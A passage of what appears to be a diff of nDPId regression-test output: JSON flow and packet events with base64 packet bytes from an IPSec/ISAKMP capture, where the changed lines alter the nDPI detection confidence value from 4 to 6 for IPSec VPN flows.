ql1VLjQIFPUGxF0O12A60vuIWCczp3gik56D6S1iGxCysc54LhGn1Y+WofC3+wVZj5gZHsp4wP1HVBThEwmWcY5m9rlGYG9sSfQKMdjHYjbny2wrd72FtjNfi9\/FoCGSfGJ57v3vYHBAUh5s7qlFnVyIleni784VqSDWk1sgG3bFLq5Tdi131RuwMezKBmvHhHLZxG1pUxv07\/7u\/FtK6kIoCpqZvmyTFGtp5l2Xrn3jP4UXslEqNUZQC\/XGD1A6O
O0lYCOJ6QNgRU8R0xTEGjko4WrZh1Nsy3DeCLqg\/zLKWgLCrK+0NjOZKJqILc5VGK4TVDyldm984ifR0a0kBTWRguG9r4uHhBEe0lKWnbvy\/nSsoTdf6UJQES6dd25qUnpXdTcEHbKj2dQMQKYkBLWmO1EjHeJ\/Dd3c\/ym07OKbgCMQPOCCHjXIGeWIaI+VAtZp2tAKPryJdHa2pcSjRW5YtPERTx\/dh0\/WGlMmw87WB1i4ye52USENJuOf"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763512920,"flow_last_seen":946763512920,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763512920,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763512920,"flow_last_seen":946763512920,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763512920,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":946763513021,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763513021,"pkt":"YDjgxTWgeJS0JASgCABFAADsmwgAAPcRO31t7buBwKgCZBGUOKQA2N42AAAAAPMxpfyYl9\/WLu8pUwPoTCguICMgAAAAAQAAAMwkAACwrhQ09Kh9+vnX5erplPpmkKxPU2ZyQ3UgWfgQd6t7a0GXP0QOt30giqAFHmWpPWeR9yE+jQc3kUdw92Kry8GP93GHU3JiQfdGX1dg80oiDVCCJN9VDUT9EYrK5BIf8TxxSxrHgnnGPhNiTcvbLhdqWqrhM+DCMWmbIQOLUP\/13aUdQqtJ2NskdLYZmBzVkSARdH\/nvMVxKh8rTWuRQL2HLCcM9jppc\/gTtn8O8w=="} 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":946763513596,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763513596,"pkt":"eJS0JASgYDjgxTWgCABFAACMtaJAAD8RmUPAqAJkbe27gTikEZQAeLpaAAAAAPMxpfyYl9\/WLu8pUwPoTCguICMIAAAAAgAAAGwwAABQwOqdhYCbmm3bEKgkQ2BLZDzIv0XnrqQcxKkQyJsdMpetHDv3PBx9ZFaXf97NlAImLdQie\/fZWDwYC39ckJH2101yaGOEgl6g\/\/96sQ=="} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946756085796,"flow_last_seen":946756088542,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1108,"flow_tot_l4_payload_len":8628,"flow_avg_l4_payload_len":575,"midstream":0,"thread_ts_msec":946763514604,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946756088542,"flow_last_seen":946756088542,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":2206,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":946763514604,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946756085796,"flow_last_seen":946756088542,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1108,"flow_tot_l4_payload_len":8628,"flow_avg_l4_payload_len":575,"midstream":0,"thread_ts_msec":946763514604,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946756088542,"flow_last_seen":946756088542,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":2206,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":946763514604,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946763527783,"pkt":"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\/7DkO\/tKQAAJAGnwH6v++hzHESJUw8bCbCkyT4PnTZHyjybPJjnO+99KQAAHAAAQARSCoF2MNPWDRowTYoccunou+lcYwAAABwAAEAFHuQrU4s4aNFV7Z3Ww3xyaLVuok4="} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQlowAAPcRQDVt7bvhwKgCZAH0KQQAPNm6qPaH0PrOV4AAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAE1BPl4uUkUN6wHNNoiXg=="} 
01514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946763527783,"pkt":"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\/7DkO\/tKQAAJAGnwH6v++hzHESJUw8bCbCkyT4PnTZHyjybPJjnO+99KQAAHAAAQARSCoF2MNPWDRowTYoccunou+lcYwAAABwAAEAFHuQrU4s4aNFV7Z3Ww3xyaLVuok4="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAANMRIBAAD8RB0bAqAJkbe274TikEZQDOJLkAAAAAKj2h9D6zleA3PDVMwKwDlEuICMIAAAAAQAAAywjAAMQ6YVobOiOu33lHVWElEunhb8i2YZ6SJ6aiLTcy0AggCQBgmcGPrbPQY+7CyG+MW\/zcDNSXNBVRgcl+deLN7pzzs+edQXQ3ymGuVucG8sedQYPWDKO0pqk+WM6U5cUWyUwI520rK2ioSJuEJdkCV3H7iyVihwVeD6c\/gw1l7DnABgddfgZZJ9zW8MF3fUS1Tzq9vNJVaWh3fAM9FMonpojpGyoxg8OOU62zE4VpWKEFj7\/WCmeuJzkx7j4rDg\/EvSq8oPo0td4HMxf1v7D7OS9vWscu7yIUVqSIDiZVbRJdDlYIbjNBcbPVNC6rFFyZPwnJX+Sh\/NZ5M10UIrHb02GQuXG4JuneW37Hzb9m5Cp0+NC\/rDSY6HIRy+PnBclndEKyb6rikYqvC9ulduFy08fbSqqMc+W4y2oTJ0OJG\/KcjYhz1txaibqAhCVAdArR11jotDvqMhm8B5EPsPrKUZp\/oqYtEtsJeBbOJDGx5fcs3Dc8xXqjhdL+atBY9dD5lX465\/aFYZrs\/p\/6tpwIqcY9Kz6JWmIB7Ve\/zKJ+poA1ggacxynpwGPIpjTkfpV1mpuPxXZOMKK9C6Sl0CzhvRHoiE9gxWSRt1Gbt0X94muIv8kCRbQpLO7GDlVVgW3yzIi1md9zzccRm+nVa7dqhbOeAj8kyoSyaHPBXZsWaB6ILEMd00K9DkZuIoJLhwtBdlKv+Y1yax7rP\/MCkCeq5\/ZogHpuRj0FnYT10WvjcqHmOuB8VG7UTXBZoq54RfhcZ7lR5s5oIy7t2S35f4DoZ8P9M9fsPffiYLS2ed4BehFN7g0VYMbUcBh4Ie9PrZuyHxRP9gLqCl04Yv6i5Nxms2GpDotE7U8zZO4S0CkjrFAUapBHjVeIzFFwvAZPvh9aY1gC0gxCsnPsS654+yD5keYzPvguogftu0HZqonVZnxJHFQ68wNssOgq7BjiGTrLmx\/9oXNTzhrxTFBoFV8LxISGtB0MAIfYYOzRkywsn+C361lzTXVciyQzka\/CKfBpLXscRaSL3Tm4Z8cEfDx"} 
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADslpIAAPcRP5Nt7bvhwKgCZBGUOKQA2OOJAAAAAKj2h9D6zleA3PDVMwKwDlEuICMgAAAAAQAAAMwkAACwLCsD4mosZGmzS9zPOH7ZB3ntKXsbrg1mTaPeWquGkKyWCRF\/OjCDE2AY7gF6+QP5GKPQ0TXBpQE1YOldvNsFNdgrlAg6Fv3aay4aOWg5YoteQM9smeql\/l\/giTcrHwj6FXV0oSRjjlv74o0goNnCWGoPIRvxv9V1EQzAD2EbVa5quQlRJ4P625uNjcSoEn1nGktCsRV4BUtWTyE9paAe2sVXXtJL9tj6EzoDGA=="} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMRPlAAD8RCY3AqAJkbe274TikEZQAeAhnAAAAAKj2h9D6zleA3PDVMwKwDlEuICMIAAAAAgAAAGwwAABQK27EVha44rT9dN9Ez3hFDAHW67\/DhEXLrtd9m2PGXusgAv2XsLrDq2JDhD6iOu+y5vuPRE4mc3OgV68O6by2edSn68oqDfBe7nI7rA=="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAMkzlFAAD8RffrAqAJkbe27gykEAfQDEKa1KYaJu7sMZisAAAAAAAAAACEgIggAAAAAAAADCCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAGpCZr8Tv7ACFVYgEqbzY1sve\/t1Siu9b8W\/hW3A6qtZkFYJVqadJiegm4pTvb26NMogwWUUtlWP\/qXODduSwhTwXP6iamDIHfg7Kn8X7hJR1pWXwVD71FiTJIOEYsmUyWmeEzqeC\/zu9xyGvUwbXmmArHQnjp6qSMSG48GBhCPWKQAAJLIBpPNgAmeSE9fKixZPfFEcqSeQBPvHP6x66fS8zQquKQAAHAAAQAS\/TJNdm1WLlcpcz5LBQYclk\/CNqgAAABwAAEAFBKHvxsW9p663xQuBned6yuZ3rpo="} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQ4hQAAPcR9Qpt7buDwKgCZAH0KQQAPL3CKYaJu7sMZisAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAAAAN01S7xqKstfAW9qRg=="} 
01518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946763527783,"pkt":"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\/t1Siu9b8W\/hW3A6qtZkFYJVqadJiegm4pTvb26NMogwWUUtlWP\/qXODduSwhTwXP6iamDIHfg7Kn8X7hJR1pWXwVD71FiTJIOEYsmUyWmeEzqeC\/zu9xyGvUwbXmmArHQnjp6qSMSG48GBhCPWKQAAJLIBpPNgAmeSE9fKixZPfFEcqSeQBPvHP6x66fS8zQquKQAAHAAAQAS\/TJNdm1WLlcpcz5LBQYclk\/CNqgAAABwAAEAFBKHvxsW9p663xQuBned6yuZ3rpo="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAANMzmhAAD8RfbvAqAJkbe27gzikEZQDOADEAAAAACmGibu7DGYryhiyRAKATQQuICMIAAAAAQAAAywjAAMQZHFfe\/8gnlR9qJ0XaigXc9ecoTEZTuVsV0qwxi1bRmdUpRcmSBOWNxBIo2zQZ87GT5G751nPElifTD02EvouEj5E5IQU0FGRIhZ7j3qicVbY1wYyM\/7b1kU+HFfeN7SZMjoFTbYpGpJMyjo3p7WV9lo5KoSnKHXuqJzQ5nWXXLqoPnImrLh+kUU67ZunIK6VGLaaD26XDMyO1detKNvu1xLMeDpFOrXgfROvyaM9mL6Qy0JMYkrFGQs6WLijsBx4j\/ypSFeU1mK2Vr4A2MyTdCX7gE7xdlnxD\/rDmJq9DKSjw38y9hbHdhc\/iY0C3nab6VMj+faSuxTiCN\/k95tmK9YlLu5z4MBIqehxNJvZVRo81XV1kO7D5ru0vQvX7cf0tIT9J14ZYj8GqLetMyXACimFrfsXJ+6fD8oXSvqO2D+TedvHL5uV5cQrYHYI3QtPsDIWRMZPu5wXI4zhSjHAUEHv3INsh0GXRCrYoJpzT5YRLAft176LjvYcBHlxGNPvZCE5t2KjYWhLWQQobkebJPDR6xT5pWmZYI9ueRBO3TvQgcZ\/hat5kGnreXGQ7iSfmvWGkfCPmPXFjh+kvXrIjh90ar8VUv+1Tytqs8wvbuQfCT0bqBnnQ0wHKmtGq+4zQe4HDQvdl1HvTuPid6itVPTZoVBuPAcHNUp0hFnsdCMDDpdm1FgfLJPXwToQnXDA2c\/JNhXZKH3mmim+MdOrjsCGgwt3Y1PkgYXOqaNOBSgE11Jy1RZvQ0\/5Hy1Z72\/5lItMJ7ICcH3gglKIhMYdmBSVMJkRCVNHMRGt4jsWV0WPzR8MoKLhDtNokirzAqbw68gQkQ4PGqIS+Q4J+oTZGYKlEpvlzNrt0Q3wyGUpaedIPOGbUXuZYVlB1CLx+A4lyyTt\/3dhRpqLAUV2OXUyLrXyBVr85YOJkK5xMpNsiocbPntT9F8wlEGHEtgW60+VKxcSAbrX\/01ANR\/PfYh\/i++s8e32ZnYFWqCyTSg5CBOpjqBxCXLuhDpjFn3tG\/pppyqmTbc9xPFbJ2D5"} 
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADs4h0AAPcR9GVt7buDwKgCZBGUOKQA2PzYAAAAACmGibu7DGYryhiyRAKATQQuICMgAAAAAQAAAMwkAACwqEBhGEkqTdk3OTJPVU+8yQTL8ZItLKounZsHCBXq6ysubqRk784GH\/owxO8EPqA9YbqFV54i4f05kBjS\/h8TdhcTet4lsitEO51fkiGfi0Vkc\/JI\/IrO1ZHnZGEeZHi6F6lpw7gAiKLzX7vKrdLCPx0wmSU9lwFSDsrE8LnuV3pSiACEa4nL+ragW0aQZ1MjWWNA\/UYXgaAtNOt3nz2vBhdfjv1epMHdb4oW+Q=="} 